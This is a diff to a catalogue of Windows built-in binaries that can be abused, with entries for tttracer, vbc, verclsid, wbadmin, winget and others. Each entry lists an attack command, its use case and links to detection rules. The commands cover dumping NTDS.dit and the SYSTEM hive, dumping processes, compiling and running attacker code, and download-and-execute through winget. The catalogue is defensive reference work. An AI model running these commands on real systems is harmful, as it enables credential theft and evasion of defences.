    Category: Execute
    Privileges: Administrator
@ -13,7 +13,7 @@ Commands:
    OperatingSystem: Windows 10 1809 and newer, Windows 11
    Tags:
      - Execute: EXE
-  - Command: TTTracer.exe -dumpFull -attach pid
+  - Command: TTTracer.exe -dumpFull -attach {PID}
    Description: Dumps process using tttracer.exe. Requires administrator privileges
    Usecase: Dump process by PID
    Category: Dump
@ -23,8 +23,6 @@ Commands:
 Full_Path:
  - Path: C:\Windows\System32\tttracer.exe
  - Path: C:\Windows\SysWOW64\tttracer.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_tttracer_mod_load.yml
--- a/yml/OSBinaries/Unregmp2.yml
+++ b/yml/OSBinaries/Unregmp2.yml
@ -1,7 +1,7 @@
 ---
 Name: Unregmp2.exe
 Description: Microsoft Windows Media Player Setup Utility
-Author: 'Wade Hickey'
+Author: Wade Hickey
 Created: 2021-12-06
 Commands:
  - Command: rmdir %temp%\lolbin /s /q 2>nul & mkdir "%temp%\lolbin\Windows Media Player" & copy C:\Windows\System32\calc.exe "%temp%\lolbin\Windows Media Player\wmpnscfg.exe" >nul && cmd /V /C "set "ProgramW6432=%temp%\lolbin" && unregmp2.exe /HideWMP"
--- a/yml/OSBinaries/Vbc.yml
+++ b/yml/OSBinaries/Vbc.yml
@ -4,14 +4,14 @@ Description: Binary file used for compile vbs code
 Author: Lior Adar
 Created: 2020-02-27
 Commands:
-  - Command: vbc.exe /target:exe c:\temp\vbs\run.vb
+  - Command: vbc.exe /target:exe {PATH_ABSOLUTE:.vb}
    Description: Binary file used by .NET to compile Visual Basic code to an executable.
    Usecase: Compile attacker code on system. Bypass defensive counter measures.
    Category: Compile
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows 7, Windows 10, Windows 11
-  - Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb
+  - Command: vbc -reference:Microsoft.VisualBasic.dll {PATH_ABSOLUTE:.vb}
    Description: Binary file used by .NET to compile Visual Basic code to an executable.
    Usecase: Compile attacker code on system. Bypass defensive counter measures.
    Category: Compile
@ -25,8 +25,6 @@ Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml
--- a/yml/OSBinaries/Verclsid.yml
+++ b/yml/OSBinaries/Verclsid.yml
@ -6,7 +6,7 @@ Created: 2018-12-04
 Commands:
  - Command: verclsid.exe /S /C {CLSID}
    Description: Used to verify a COM object before it is instantiated by Windows Explorer
-    Usecase: Run a com object created in registry to evade defensive counter measures
+    Usecase: Run a COM object created in registry to evade defensive counter measures
    Category: Execute
    Privileges: User
    MitreID: T1218.012
@ -16,8 +16,6 @@ Commands:
 Full_Path:
  - Path: C:\Windows\System32\verclsid.exe
  - Path: C:\Windows\SysWOW64\verclsid.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml
  - Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/verclsid_clsid_execution.yml
--- a/yml/OSBinaries/Wab.yml
+++ b/yml/OSBinaries/Wab.yml
@ -1,7 +1,7 @@
 ---
 Name: Wab.exe
 Description: Windows address book manager
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
  - Command: wab.exe
@ -16,8 +16,6 @@ Commands:
 Full_Path:
  - Path: C:\Program Files\Windows Mail\wab.exe
  - Path: C:\Program Files (x86)\Windows Mail\wab.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/registry/registry_set/registry_set_wab_dllpath_reg_change.yml
  - IOC: WAB.exe should normally never be used
--- a/yml/OSBinaries/Wbadmin.yml
+++ b/yml/OSBinaries/Wbadmin.yml
@ -4,14 +4,14 @@ Description: Windows Backup Administration utility
 Author: Chris Eastwood
 Created: 2024-04-05
 Commands:
-  - Command: wbadmin start backup -backupTarget:C:\temp\ -include:C:\Windows\NTDS\NTDS.dit,C:\Windows\System32\config\SYSTEM -quiet
+  - Command: wbadmin start backup -backupTarget:{PATH_ABSOLUTE:folder} -include:C:\Windows\NTDS\NTDS.dit,C:\Windows\System32\config\SYSTEM -quiet
    Description: Extract NTDS.dit and SYSTEM hive into backup virtual hard drive file (.vhdx)
    Usecase: Snapshoting of Active Directory NTDS.dit database
    Category: Dump
    Privileges: Administrator, Backup Operators, SeBackupPrivilege
    MitreID: T1003.003
    OperatingSystem: Windows Server
-  - Command: wbadmin start recovery -version:<VERSIONIDENTIFIER> -recoverytarget:C:\temp -itemtype:file -items:C:\Windows\NTDS\NTDS.dit,C:\Windows\System32\config\SYSTEM -notRestoreAcl -quiet
+  - Command: wbadmin start recovery -version:<VERSIONIDENTIFIER> -recoverytarget:{PATH_ABSOLUTE:folder} -itemtype:file -items:C:\Windows\NTDS\NTDS.dit,C:\Windows\System32\config\SYSTEM -notRestoreAcl -quiet
    Description: Restore a version of NTDS.dit and SYSTEM hive into file path. The command `wbadmin get versions` can be used to find version identifiers.
    Usecase: Dumping of Active Directory NTDS.dit database
    Category: Dump
--- a/yml/OSBinaries/Winget.yml
+++ b/yml/OSBinaries/Winget.yml
@ -4,8 +4,8 @@ Description: Windows Package Manager tool
 Author: Paul Sanders
 Created: 2022-01-03
 Commands:
-  - Command: winget.exe install --manifest manifest.yml
+  - Command: winget.exe install --manifest {PATH:.yml}
-    Description: 'Downloads a file from the web address specified in manifest.yml and executes it on the system. Local manifest setting must be enabled in winget for it to work: `winget settings --enable LocalManifestFiles`'
+    Description: 'Downloads a file from the web address specified in .yml file and executes it on the system. Local manifest setting must be enabled in winget for it to work: `winget settings --enable LocalManifestFiles`'
    Usecase: Download and execute an arbitrary file from the internet
    Category: Execute
    Privileges: Local Administrator - required to enable local manifest setting
@ -14,7 +14,7 @@ Commands:
    Tags:
      - Execute: Remote
      - Execute: EXE
-  - Command: winget.exe install --accept-package-agreements -s msstore [name or ID]
+  - Command: winget.exe install --accept-package-agreements -s msstore {name or ID}
    Description: 'Download and install any software from the Microsoft Store using its name or Store ID, even if the Microsoft Store App itself is blocked on the machine. For example, use "Sysinternals Suite" or `9p7knl5rwt25` for obtaining ProcDump, PsExec via the Sysinternals Suite. Note: a Microsoft account is required for this.'
    Usecase: Download and install software from Microsoft Store, even if Microsoft Store App is blocked
    Category: Download
--- a/Show More
+++ b/Show More